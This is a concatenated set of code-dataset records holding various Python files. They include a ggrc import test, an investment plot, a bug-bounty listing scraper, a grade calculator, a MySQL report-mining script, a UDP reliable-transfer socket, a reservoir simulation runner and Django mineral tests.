fields.\"\"\"\n\nimport collections\nimport ddt\n\nfrom ggrc.models import all_models\nfrom integration.ggrc import TestCase\n\n\n@ddt.ddt\nclass TestImportCommentable(TestCase):\n \"\"\"Class with tests of importing fields of Commentable mixin.\"\"\"\n\n @ddt.data(\n all_models.Objective,\n all_models.Requirement,\n all_models.Regulation,\n all_models.Policy,\n all_models.Standard,\n all_models.Threat,\n all_models.Contract,\n )\n def test_model_import(self, model):\n \"\"\"Test import commentable model {}.\"\"\"\n recipients = model.VALID_RECIPIENTS\n model_name = model.__name__\n import_data = [\n (\"object_type\", model_name),\n (\"Code\", \"\"),\n (\"Title\", \"{}-Title\".format(model_name)),\n (\"Admin\", \"user@example.com\"),\n (\"Recipients\", ','.join(recipients)),\n (\"Send by default\", True),\n ]\n response = self.import_data(collections.OrderedDict(import_data))\n self._check_csv_response(response, {})\n obj = model.query.first()\n self.assertEqual(obj.send_by_default, True)\n self.assertEqual(sorted(obj.recipients.split(\",\")), sorted(recipients))\n\n def test_program_import(self):\n \"\"\"Test import of program recipients.\"\"\"\n recipients = all_models.Program.VALID_RECIPIENTS\n model_name = \"Program\"\n import_data = [\n (\"object_type\", model_name),\n (\"Code\", \"\"),\n (\"Title\", \"{}-Title\".format(model_name)),\n (\"Program Managers\", \"user@example.com\"),\n (\"Recipients\", ','.join(recipients)),\n (\"Send by default\", True),\n ]\n response = self.import_data(collections.OrderedDict(import_data))\n self._check_csv_response(response, {})\n obj = 
all_models.Program.query.first()\n self.assertEqual(obj.send_by_default, True)\n self.assertEqual(sorted(obj.recipients.split(\",\")), sorted(recipients))\n","sub_path":"test/integration/ggrc/converters/test_import_commentable.py","file_name":"test_import_commentable.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"441236318","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ntr = 10\na = 2\ntc = .15\np = 75\ni = .10\nc = .005\ny = 10\nz = 0\nx = 0\nn = 0\n#taxableInvest = (tc * p * (1+i)**y + (1 - tc)*tr * a)\ntaxableInvest = (.85*(75) * (1 + .10)**y) + .15*(75)\nrothInvest = (p * (1 + i - c)**y)\n\nprint ('roth invest %s' % rothInvest)\nprint ('tax invest %s' % taxableInvest)\nplt.figure(1)\nplt.subplot(221)\nplt.title('Roth')\nplt.yscale('linear')\nplt.ylabel('dollars')\nplt.xlabel('years')\n#plt.axis([1,5,1,1000])\n#plt.plot([y, rothInvest], 'r--')\nplt.plot([0,rothInvest], 'b--')\n#plt.plot([y, taxableInvest], 'b--')\nplt.grid(True)\n\nplt.show()","sub_path":"python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382425433","text":"import scrapy\nfrom urllib.parse import urlparse\nfrom scrapy.linkextractors import LinkExtractor\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\n\n\nclass BugBountyScraperSpider(scrapy.Spider):\n name = \"bug_bounty_scraper\"\n\n def start_requests(self):\n urls = [\n 'https://bountyfactory.io/programs',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n for a in response.css('a.media-heading.text-semibold'):\n yield response.follow(a, callback=self.parse_company)\n\n # IF MANY PAGES :\n # next_page = response.css('li.next a::attr(href)').extract_first()\n # if next_page is not None:\n # yield response.follow(next_page, self.parse)\n\n def get_company_info(self, name):\n url = 'https://www.google.fr/search?q=' + name\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n desc = soup.find(\"span\", { \"class\" : \"st\" }).text\n\n date_creation = ''\n reg = re.search('Création[^0-9]*([0-9]*)', r.text)\n if reg is not None:\n date_creation = reg.group(1)\n if reg is None:\n reg = re.search('Effectif[^0-9]*([0-9 ]*)', r.text)\n employee_number = ''\n reg = re.search('Nombre d[^0-9]*([0-9]*)', r.text)\n if reg is not None:\n employee_number = reg.group(1)\n\n\n return desc,date_creation,employee_number\n\n def parse_company(self, response):\n links = LinkExtractor(restrict_css='div.panel-body.markdown', deny_domains=['github.com', 'bountyfactory.io']).extract_links(response)\n urls = [link.url for link in links]\n hostnames = [urlparse(url).hostname for url in urls]\n\n name = response.url.split(\"/\")[-2]\n desc, date_creation, employee_number = self.get_company_info(name)\n\n yield {\n 'company': name,\n 'domains': hostnames,\n 'desc': desc,\n 'date_creation': date_creation,\n 'employee_number': employee_number,\n }\n","sub_path":"scraping_test/spiders/bounty_factory.py","file_name":"bounty_factory.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"190646037","text":"#Leia 2 (duas) notas parciais de um aluno, calcule a média e escreva a mensagem:\r\n#o \"Aprovado\", se a média alcançada for maior ou igual a sete;\r\n#o \"Reprovado\", 
se a média for menor do que sete;\r\n#o \"Aprovado com Distinção\", se a média for igual a dez.\r\n\r\nnota_1 = int(input('Digite a primeira nota: '))\r\nnota_2 = int(input('Digite a segunda nota: '))\r\n\r\nmedia = ( nota_1 + nota_2 ) / 2\r\n\r\nif media >= 7:\r\n print('Aprovado')\r\n\r\nif media < 7 :\r\n print('Reprovado')\r\n\r\nif media == 10:\r\n print('Aprovado com distinção')","sub_path":"Fabio02_P02/F2_P2_Q4_MEDIAALUNO.py","file_name":"F2_P2_Q4_MEDIAALUNO.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"347897870","text":"import xml.etree.ElementTree as ET\nimport mysql.connector \nfrom mysql.connector import errorcode\nfrom sys import *\n#import the module in other directory\nimport platform as pf\nimport re\n\n\nos = pf.platform()\nif re.match(r'Windows.*', os):\n path.append('C:\\\\Users\\\\EMAAHAF\\\\Documents\\\\TestOptimization_Ericsson\\\\DBS_connections')\nelse:\n path.append('/repo/ezhuyui/test_optimizatoin_research/data_loading_module')\nimport DBS_connection_dictonaries as dc\n\n##---------------------------------self\n\ndef get_tr(area):\n #source_table_ctc = \"tar_ctc_runs_\" + area\n #source_table_suite = \"tar_testsuite_runs\"\n tr_area = \"tr_\" + area\n conn_ezh = dc.ini_db_connection(dc.ezh)\n try:\n dc.cleanup_ezh(tr_area)\n cur_ezh = conn_ezh.cursor()\n query = \"CREATE TABLE %s (ThcTcJavaName varchar(200) NOT NULL, trid VARCHAR(64), dateFiled date, PRIMARY KEY (ThcTcJavaName, trid, dateFiled))\"%(tr_area)\n cur_ezh.execute(query)\n query = \"SELECT ThcTcJavaName, trid, DATE(EndDateTime) as df FROM tdrhistory.tar_ctc_runs WHERE (SeqId > 37600199 AND SeqId < 39999901) AND qualityarea = 'Functionality' AND testdata LIKE '%ENB=OT%' AND trid IS NOT NULL AND trid NOT LIKE '%%artf%%' AND trid NOT LIKE '%%RTT%%' GROUP BY ThcTcJavaName, trid, df;\"\n cur_ezh.execute(query)\n trids = cur_ezh.fetchall()\n for row in trids:\n tr = row[1].split(',')\n for item in tr:\n if(' ' in item):\n item = item.replace(' ', '')\n #elif('?' 
in item):\n # item = item.replace('?', '')\n #check = re.search('\\w{2}\\d{5}', item)\n #if(not check):\n # continue\n #item = check.group()\n query = \"SELECT * FROM %s WHERE ThcTcJavaName = '%s' AND trid = '%s' AND dateFiled = '%s'\"%(tr_area, row[0], item, row[2])\n cur_ezh.execute(query)\n duplicate = cur_ezh.fetchall()\n if(len(duplicate) != 0):\n continue\n query = \"INSERT INTO %s VALUES ('%s','%s','%s')\"%(tr_area, row[0], item, row[2])\n cur_ezh.execute(query)\n \n \n\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n \n \n\n\nif __name__ == \"__main__\":\n area = argv[1]\n get_tr(area)","sub_path":"pyscripts/pyscripts_old/tr_mining/tr_area.py","file_name":"tr_area.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510174236","text":"class Solution(object):\n def numEquivDominoPairs(self, dominoes):\n \"\"\"\n :type dominoes: List[List[int]]\n :rtype: int\n \"\"\"\n r = sorted(map(sorted, dominoes))\n ans = 0\n t = 0\n for i in range(1, len(r)):\n if r[i] == r[i - 1]:\n t += 1\n else:\n ans += for_sum(t)\n t = 0\n\n if t:\n ans += for_sum(t)\n\n return ans\n\n\ndef for_sum(n):\n return (1 + n) * n / 2\n\n\ns = Solution()\nprint(s.numEquivDominoPairs([[1, 2], [1, 2], [1, 1], [1, 2], [2, 2]]))\n","sub_path":"leetcode/algorithm/number-of-equivalent-domino-pairs.py","file_name":"number-of-equivalent-domino-pairs.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"224280024","text":"from mcpi.minecraft import Minecraft\nimport time\n\nmc = Minecraft.create()\n\ntime.sleep(2)\n\npos = mc.player.getPos()\n\nx = pos.x\ny = pos.y\nz = pos.z\n\nblockType = mc.getBlock(x,y,z)\n\nmc.postToChat(str(blockType))\nmc.postToChat(\"I am in water: \" + str(blockType ==9 ))\n\n\n","sub_path":"minecraft-pi/bookCode/Mission18_AmISwimming.py","file_name":"Mission18_AmISwimming.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"433002690","text":"import struct\nimport time\nimport udp\nimport enum\nimport logging\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n\n#GLOBAL CLASSICAL VALUES\nWINDOWS_SIZE = 8\nmaxl = 1024 #max length\nmaxre = 10 #max retry if timeout\nReset_bit = 8\nSYN = 4\nNIF = 2\nACK = 1\nudp_packet_length = 500\nbegin_bytes = b'000000000000000'\nuser_address = (\"127.0.0.1\", 9942)\n\nclass TODO(enum.Enum):\n A = 0 #bind\n B = 1 #listen\n C = 2 #accept\n D = 3 #connect_requested\n E = 4 #connect\n F = 5 #close_requested\n G = 6 #close\n\nclass CONDITION(enum.Enum):\n A = 0 #OPENED\n B = 1 #LISTENING\n C = 2 #CONNECTING\n D = 3 #CONNECTED\n E = 4 #CLOSING\n F = 5 #CLOSED\n\n\nclass FSM(object):\n def __init__(self, condition=None):\n if type(condition) == CONDITION:\n sc = condition\n elif type(condition) == int:\n sc = CONDITION(condition)\n elif condition is None:\n sc = CONDITION.A\n else:\n raise ValueError(\"Invalid condition\")\n self._current = sc\n\n @property\n def current(self):\n return self._current\n\n @current.setter\n def current(self, current: CONDITION):\n logging.info('Change From %s to %s', self._current, current)\n self._current = 
current\n\n def dispatch(self, todo: TODO):\n sc = self._current\n if sc == CONDITION.A:\n if todo == TODO.A:\n sc = CONDITION.B\n elif todo == TODO.B:\n sc = CONDITION.B\n elif todo == TODO.E:\n sc = CONDITION.D\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.D:\n if todo == TODO.F:\n sc = CONDITION.E\n elif todo == TODO.G:\n sc = CONDITION.F\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.B:\n if todo == TODO.D:\n sc = CONDITION.C\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.E:\n if todo == TODO.G:\n sc = CONDITION.F\n else:\n raise ValueError(\"Invalid action\")\n elif sc == CONDITION.C:\n if todo == TODO.C:\n sc = CONDITION.D\n else:\n raise ValueError(\"Invalid action\")\n else:\n logging.warning(\"Nothing to do\")\n self.current = sc\n\n\nclass datagram(object):\n def _set_header(self, offset, value):\n tmp = list(self._header)\n for index, byte in enumerate(value):\n tmp[offset + index] = byte\n self._header = bytes(tmp)\n\n # For datagram type\n @property\n def dtype(self) -> int:\n return self._dtype\n\n @dtype.setter\n def dtype(self, dtype: int):\n self._dtype = dtype\n self._set_header(0, self._dtype.to_bytes(1, 'big'))\n\n # For Seq\n @property\n def seq(self):\n return int.from_bytes(self._seq, 'big')\n\n @seq.setter\n def seq(self, seq):\n if type(seq) == int:\n self._seq = seq.to_bytes(4, 'big')\n self._set_header(1, self._seq)\n else:\n raise ValueError(\"Seq number must be an integer\")\n\n # For SEQ_ACK\n @property\n def seq_ack(self):\n return int.from_bytes(self._seq_ack, 'big')\n\n @seq_ack.setter\n def seq_ack(self, seq_ack):\n if type(seq_ack) == int:\n self._seq_ack = seq_ack.to_bytes(4, 'big')\n self._set_header(5, self._seq_ack)\n else:\n raise ValueError(\"SEQ_ACK number must be an integer\")\n\n # For LEN\n @property\n def length(self):\n return int.from_bytes(self._length, 'big')\n\n @length.setter\n def length(self, length):\n raise NotImplementedError(\"Length cannot be set.\")\n\n # For CHECKSUM\n @property\n def checksum(self):\n tmp = self._header[0:13] + b'\\x00\\x00' + self._payload\n sum = 0\n for byte in tmp:\n sum += byte\n sum = -(sum % 256)\n return (sum & 0xFF)\n\n @checksum.setter\n def checksum(self, checksum):\n raise NotImplementedError(\"Checksum cannot be set.\")\n\n @property\n def valid(self):\n return self.checksum == int.from_bytes(self._checksum, 'big')\n\n # For PAYLOAD\n @property\n def payload(self):\n return self._payload\n\n @payload.setter\n def payload(self, payload):\n if type(payload) == bytes:\n self._length = len(payload).to_bytes(4, 'big')\n self._set_header(9, self._length)\n self._payload = payload\n else:\n raise TypeError(\"a bytes-like object is expected\")\n\n def __init__(self, raw_data=None):\n if type(raw_data) == bytes:\n self._decode(raw_data)\n else:\n self._header = bytes(15)\n self._dtype = 0\n self._seq = bytes(4)\n self._seq_ack = bytes(4)\n self._length = bytes(4)\n self._checksum = bytes(2)\n self._payload = b''\n\n def _decode(self, raw_data: bytes):\n if len(raw_data) < 15:\n raise ValueError(\"Invalid data!\")\n self._header = raw_data[0:15]\n self._dtype = self._header[0]\n self._seq = self._header[1: 5]\n self._seq_ack = self._header[5: 9]\n self._length = self._header[9: 13]\n self._checksum = self._header[13: 15]\n\n self._payload = raw_data[15:]\n\n def _encode(self):\n self._set_header(13, self.checksum.to_bytes(2, 'big'))\n return self._header + self._payload\n\n def __call__(self):\n return self._encode()\n\n def 
__str__(self):\n return self.__repr__()\n\n def __repr__(self):\n try:\n res = \"Type:\\t{}\\nSeq:\\t{}\\nSEQ_ACK:\\t{}\\nLENGTH:\\t{}\\nChecksum:\\t{}\\nPayload:\\t{}\".format(\n self.dtype, self.seq, self.seq_ack, self.length, self.checksum, self.payload)\n return res\n except Exception:\n return \"Invalid\"\n\n\ndef check_sum(data):\n pass\n\ndef header_send(args):\n pass\n\nclass socket(udp.UDPsocket):\n def __init__(self, ):\n super().__init__()\n self.condition = FSM(CONDITION.A)\n self.seq = 0\n self.seq_ack = 0\n self.accept_null = True\n\n def bind(self, addr):\n self.condition.dispatch(TODO.A)\n super().bind(addr)\n\n def accept(self):\n print(\"Accept is not implemented for connectionless rdt\")\n raise NotImplementedError\n\n def connect(self, addr):\n self.to = addr\n\n def close(self):\n print(\"Close is not implemented for connectionless \")\n raise NotImplementedError\n\n def recvfrom(self, bufsize=2048):\n QvQ = super().recvfrom(bufsize)\n if QvQ is None:\n raise udp.timeout\n\n data, addr = QvQ\n data = datagram(data)\n if data.valid:\n return data, addr\n raise Exception(\"Invalid packet\")\n\n def recv(self, bufsize: int):\n\n rcvd_data = b''\n timeout_count = -1\n expected = self.seq_ack\n\n ack = datagram()\n\n logging.info('receive Ready ...')\n while True:\n try:\n data, addr = self.recvfrom(bufsize)\n\n logging.debug('received raw segment')\n timeout_count = 0 # no timeout, reset\n\n logging.info('expected: #%d, received: #%d', expected, data.seq)\n if data.seq == expected:\n if data.dtype & NIF:\n logging.info('FIN Recieved')\n break\n else:\n rcvd_data += data.payload\n expected += 1\n ack.seq = self.seq\n ack.seq_ack = expected\n super().sendto(ack(), addr)\n except udp.timeout:\n if timeout_count < 0:\n continue\n timeout_count += 1\n logging.info('timed out, count=%d', timeout_count)\n if timeout_count > maxre:\n raise ConnectionAbortedError('timed out')\n except ValueError:\n ack.seq = self.seq\n ack.seq_ack = expected\n super().sendto(ack(), addr)\n except Exception as e:\n logging.warning(e)\n\n self.seq += 1\n self.seq_ack = expected + 1\n\n nif_ack = datagram()\n nif_ack.dtype |= NIF\n nif_ack.dtype |= ACK\n nif_ack.seq = self.seq\n nif_ack.seq_ack = self.seq_ack\n nif_err_count = 0\n self.sendto(nif_ack(), addr)\n\n logging.info('----------- receipt finished -----------')\n return rcvd_data\n\n def recv_(self, buffersize=None, header_format=None, data_format=None):\n print(\"data in\")\n try:\n data_uesless, addr_uesless = self.recvfrom(buffersize)\n except BlockingIOError:\n pass\n except TypeError:\n pass\n temp_ack = self.seq_ack\n data_willsend = \"\"\n count = 0\n while True:\n time.sleep(0.01)\n try:\n data, addr = self.recvfrom(buffersize)\n except BlockingIOError:\n continue\n except TypeError:\n continue\n if check_sum(data):\n continue\n data_header = struct.unpack(header_format, data[0:15])\n try:\n datas = str(struct.unpack(\"{}s\".format(str(data_header[3])), data[15:])[0].decode(data_format))\n except UnicodeDecodeError:\n continue\n except struct.error:\n continue\n if datas == \"\" and self.accept_null:\n continue\n else:\n print(\"this time recieve {}\".format(datas))\n self.segment = data_header[0]\n if not check_sum(data) and data_header[1] == temp_ack:\n count += 1\n data_willsend += datas\n print(header_send)\n for i in range(0, 3, 1):\n self.sendto(header_send, self.client_address)\n temp_ack += len(datas)\n if self.segment == count:\n break\n for i in range(0, 100, 1):\n time.sleep(0.01)\n print(\"recieve finish\")\n self.seq_ack = 
temp_ack\n self.accept_null = False\n return data_willsend\n\n def send(self, content: bytes, reciver_addr):\n acked = []\n buffer = []\n\n base = self.seq\n now = 0\n\n for i in range(0, len(content), maxl):\n cl = min(maxl, len(content) - i)\n data = datagram()\n data.payload = content[i:i + cl]\n data.seq = base + now\n now += 1\n buffer.append(data)\n acked.append(False)\n\n tn = 0 #counting timeout number\n l, r = 0, 0\n while l < len(buffer):\n r = min(len(buffer), l + WINDOWS_SIZE)\n\n logging.info('Send packet from [%d, %d]' % (buffer[l].seq, buffer[r - 1].seq))\n for i in range(l, r):\n pkt = buffer[i]\n pkt.seq_ack = self.seq_ack\n self.sendto(pkt(), reciver_addr)\n\n while True:\n conuti = 0;\n try:\n data, addr = self.recvfrom(2048)\n assert addr == reciver_addr\n tn = 0\n logging.info('#%d acked', data.seq_ack)\n assert buffer[l].seq <= data.seq_ack <= buffer[r - 1].seq + 1\n l = max(l, data.seq_ack - base)\n logging.debug('base=%d', base)\n logging.info('Window length = %d', r - l)\n if r - l == 0:\n logging.info('Finish sending')\n break\n except ValueError:\n conuti += 1\n continue\n except AssertionError:\n conuti += 1\n continue\n except BlockingIOError:\n conuti += 1\n continue\n except TypeError:\n conuti += 1\n continue\n except udp.timeout:\n tn += 1\n logging.info('timed out, count=%d', tn)\n if tn > maxre:\n raise ConnectionError('time out')\n break\n except Exception:\n logging.warning(Exception)\n\n # Finish\n nif = datagram()\n nif.dtype = NIF\n nif.seq = base + now\n nif.seq_ack = self.seq_ack\n nif_err_count = 0\n while True:\n try:\n self.sendto(nif(), reciver_addr)\n data, addr = self.recvfrom(2048)\n\n if data.dtype & ACK and data.dtype & NIF and data.seq_ack == base + now + 1:\n break\n except (udp.timeout, ValueError):\n nif_err_count += 1\n if nif_err_count > maxre:\n break\n except Exception:\n logging.warning(Exception)\n\n self.seq = base + now + 1\n logging.info('----------- all sent -----------')\n","sub_path":"Assignment07/rdt.py","file_name":"rdt.py","file_ext":"py","file_size_in_byte":13352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421789919","text":"#!/usr/bin/env python3.4\n#coding:utf-8\n\n'''\nLeetcode一步一个脚印。\n\n334. 
Increasing Triplet Subsequence\n\n思路:\n 刚开始没有看懂题目,以为要连续的三个数满足i1 \", checkNumerosValidos(casosTest.__dict__[attr]))","sub_path":"Sudoku/checkNumerosValidos.py","file_name":"checkNumerosValidos.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"203907061","text":"from packs.directories import data_loaded\nfrom packs import directories as direc\nfrom packs.running.compositional_initial_mesh_properties import initial_mesh\nfrom packs.compositional.stability_check import StabilityCheck\nfrom packs.compositional.update_time import delta_time\nfrom get_inputs_compositional import FluidProperties\nfrom packs.utils import constants as ctes\nimport os\nimport numpy as np\nimport time\n\nif data_loaded['compositional_data']['solver']['IMPSAT']:\n from packs.compositional.IMPSAT.compositionalIMPSAT import CompositionalFVM\n from packs.compositional.IMPSAT.properties_calculation import PropertiesCalc\nelse:\n from packs.compositional.IMPEC.compositionalIMPEC import CompositionalFVM\n from packs.compositional.IMPEC.properties_calculation import PropertiesCalc\n\nclass run_simulation:\n '''Class created to compute simulation properties at each simulation time'''\n def __init__(self, name_current, name_all):\n self.name_current_results =os.path.join(direc.flying, name_current + '.npy')\n self.name_all_results = os.path.join(direc.flying, name_all)\n self.loop = 0\n self.vpi = 0.0\n self.t = 0.0\n self.oil_production = 0.\n self.gas_production = 0.\n self.use_vpi = data_loaded['use_vpi']\n self.vpi_save = data_loaded['compositional_data']['vpis_para_gravar_vtk']\n self.time_save = np.array(data_loaded['compositional_data']['time_to_save'])\n self.delta_t = data_loaded['compositional_data']['time_data']['delta_t_ini']\n self.mesh_name = 'compositional_'\n self.all_results = self.get_empty_current_compositional_results()\n self.p1 = PropertiesCalc()\n\n def initialize(self, load, convert, mesh):\n ''' Function to initialize mesh (preprocess) get and compute initial mesh \\\n properties '''\n M, elements_lv0, data_impress, wells = initial_mesh(mesh, load=load, convert=convert)\n ctes.init(M, wells)\n ctes.component_properties()\n if ctes.FR:\n from packs.compositional import prep_FR as ctes_FR\n ctes_FR.run(M)\n fprop = self.get_initial_properties(M, wells)\n return M, data_impress, wells, fprop, load\n\n def get_initial_properties(self, M, wells):\n ''' get initial fluid - oil, gas and water data and calculate initial \\\n properties'''\n\n fprop = FluidProperties(M, wells) # load reservoir properties data and initialize other data\n #fprop.z[:,0] = np.array([0.9,0.1,0.])\n\n '------------------------- Perform initial flash ----------------------'\n\n if ctes.load_k:\n self.p2 = StabilityCheck(fprop.P, fprop.T)\n fprop.L, fprop.V, fprop.xkj[0:ctes.Nc, 0, :], \\\n fprop.xkj[0:ctes.Nc, 1, :], fprop.Csi_j[:,0,:], \\\n fprop.Csi_j[:,1,:], fprop.rho_j[:,0,:], fprop.rho_j[:,1,:] = \\\n self.p2.run_init(fprop.P, np.copy(fprop.z))\n\n if any(([wells['inj_cond']=='reservoir'])):\n z = (wells['z'][wells['inj_cond']=='reservoir']).T\n p_well = StabilityCheck(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']], fprop.T)\n L, V, x, y, Csi_L, Csi_V, rho_L, rho_V = \\\n p_well.run_init(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']],z[:ctes.Nc])\n self.q_vol = np.copy(wells['values_q'][:,wells['inj_cond']=='reservoir'])\n wells['values_q'][:,wells['inj_cond']=='reservoir'] = (Csi_V * V + Csi_L * L) * self.q_vol\n\n 
else: fprop.x = []; fprop.y = []; fprop.L = []; fprop.V = []\n\n if ctes.load_w: fprop.inputs_water_properties(M) #load water properties\n\n '----------------------- Calculate fluid properties -------------------'\n\n self.p1.run_outside_loop(M, fprop, wells)\n return fprop\n\n def run(self, M, wells, fprop, load):\n ''' Function created to compute reservoir and fluid properties at each \\\n time step '''\n\n t0 = time.time()\n t_obj = delta_time(fprop) #get wanted properties in t=n\n\n '---- Get pressure field and new time step (if the past time step does \\\n not obey the CFL condition) -------------------------------------------'\n\n self.delta_t = CompositionalFVM()(M, wells, fprop, self.delta_t, self.t)\n\n self.t += self.delta_t\n '----------------- Perform Phase stability test and flash -------------'\n\n if ctes.load_k and ctes.compressible_k:\n #self.p2 = StabilityCheck(fprop.P, fprop.T)\n fprop.L, fprop.V, fprop.xkj[0:ctes.Nc, 0, :], \\\n fprop.xkj[0:ctes.Nc, 1, :], fprop.Csi_j[:,0,:], \\\n fprop.Csi_j[:,1,:], fprop.rho_j[:,0,:], fprop.rho_j[:,1,:] = \\\n self.p2.run(fprop.P, np.copy(fprop.z))\n\n if any(([wells['inj_cond']=='reservoir'])):\n z = (wells['z'][wells['inj_cond']=='reservoir']).T\n p_well = StabilityCheck(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']], fprop.T)\n L, V, x, y, Csi_L, Csi_V, rho_L, rho_V = \\\n p_well.run_init(fprop.P[wells['ws_q'][wells['inj_cond']=='reservoir']],z[:ctes.Nc])\n wells['values_q'][:,wells['inj_cond']=='reservoir'] = (Csi_V * V + Csi_L * L) * self.q_vol\n\n '----------------------- Update fluid properties ----------------------'\n\n self.p1.run_inside_loop(M, fprop)\n\n\n '-------------------- Advance in time and save results ----------------'\n\n self.update_vpi(fprop, wells)\n #if self.vpi>0.2: import pdb; pdb.set_trace()\n self.delta_t = t_obj.update_delta_t(self.delta_t, fprop, ctes.load_k, self.loop)#get delta_t with properties in t=n and t=n+1\n if len(wells['ws_p'])>0: self.update_production(fprop, wells)\n\n self.update_loop()\n t1 = time.time()\n dt = t1 - t0\n if self.use_vpi:\n if np.round(self.vpi,3) in self.vpi_save:\n self.update_current_compositional_results(M, wells, fprop, dt) #ver quem vou salvar\n else:\n if self.time_save[0] == 0.0 or self.t in self.time_save:\n self.update_current_compositional_results(M, wells, fprop, dt)\n #import pdb; pdb.set_trace()\n\n\n\n def update_loop(self):\n ''' Function to count how many loops it has been since the simulation \\\n started'''\n\n self.loop += 1\n\n def update_vpi(self, fprop, wells):\n ''' Function to update time in vpi units (volume poroso injetado)'''\n\n if len(wells['ws_inj'])>0:\n flux_vols_total = wells['values_q_vol']\n flux_total_inj = np.absolute(flux_vols_total)\n else: flux_total_inj = np.zeros(2)\n self.vpi = self.vpi + (flux_total_inj.sum())/sum(fprop.Vp)*self.delta_t\n\n\n def get_empty_current_compositional_results(self):\n return [np.array(['loop', 'vpi [s]', 'simulation_time [s]', 't [s]', 'pressure [Pa]', 'Sw', 'So', 'Sg',\n 'Oil_p', 'Gas_p', 'z', 'centroids', 'Nk', 'xkj'])]\n\n def update_production(self, fprop, wells):\n ''' Function to compute oil and gas production rate [m³/s] through time'''\n if ctes.load_k:\n self.oil_production += abs(fprop.q_phase[:,0].sum()) *self.delta_t\n self.gas_production += abs(fprop.q_phase[:,1].sum())*self.delta_t\n\n def update_current_compositional_results(self, M, wells, fprop, simulation_time: float = 0.0):\n\n #total_flux_internal_faces = fprop.total_flux_internal_faces.ravel() #* 
M.faces.normal[M.faces.internal]\n #total_flux_internal_faces_vector = fprop.total_flux_internal_faces.T * np.abs(M.faces.normal[M.faces.internal])\n if ctes.FR: Nk = fprop.Nk_SP\n else: Nk = fprop.Nk\n self.current_compositional_results = np.array([self.loop, self.vpi, simulation_time,\n self.t, fprop.P, fprop.Sw, fprop.So, fprop.Sg, self.oil_production,\n self.gas_production, fprop.z, M.data['centroid_volumes'], Nk, fprop.xkj],dtype=object)\n self.all_results.append(self.current_compositional_results)\n M.data['saturation'] = fprop.Sw\n M.data['So'] = fprop.So\n M.data['Sg'] = fprop.Sg\n M.data['P'] = fprop.P\n M.data.update_variables_to_mesh()\n M.core.print(file = self.name_all_results + str(self.loop), extension ='.vtk')\n\n def export_current_compositional_results(self):\n np.save(self.name_current_results, self.current_compositional_results)\n\n def export_all_results(self):\n np.save(self.name_all_results + str(self.loop) + '.npy', np.array(self.all_results))\n self.all_results = self.get_empty_current_compositional_results()\n\n def save_infos(self, data_impress, M):\n self.export_current_compositional_results()\n self.export_all_results()\n #data_impress.update_variables_to_mesh()\n #data_impress.export_all_datas_to_npz()\n #M.core.print(file=self.mesh_name, extension='.h5m', config_input=\"input_cards/print_settings.yml\")\n # M.core.print(file = self.mesh_name, extension='.vtk', config_input=\"input_cards/print_settings.yml\")\n","sub_path":"adm_impec-00/run_compositional.py","file_name":"run_compositional.py","file_ext":"py","file_size_in_byte":9122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"582118862","text":"from django.core.urlresolvers import reverse\nfrom django.db import IntegrityError\nfrom django.test import TestCase\nfrom .models import Mineral\n\n\nclass MineralModelTests(TestCase):\n def setUp(self):\n self.mineral_one = Mineral.objects.create(\n name=\"MineratiTesti\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest'\n )\n\n self.mineral_two = Mineral.objects.create(\n name=\"MineratiTestiTwo\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest'\n )\n\n def test_mineral_creation(self):\n all_minerals = Mineral.objects.all()\n self.assertIn(self.mineral_one, all_minerals)\n self.assertIn(self.mineral_two, all_minerals)\n\n with self.assertRaises(IntegrityError):\n # to test unique name unqiuness\n self.mineral_three = Mineral.objects.create(\n name=\"MineratiTesti\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest')\n\n\nclass MineralsViews(TestCase):\n def setUp(self):\n self.mineral_one = Mineral.objects.create(\n name=\"MineratiTesti\",\n image_filename='mineratitesti.jpg',\n image_caption='caption test',\n category='category test',\n formula='C31H32N4Ni',\n color='colortest',\n refractive_index='refractivetest')\n\n def test_mineral_list_view(self):\n resp = self.client.get(reverse('home'))\n 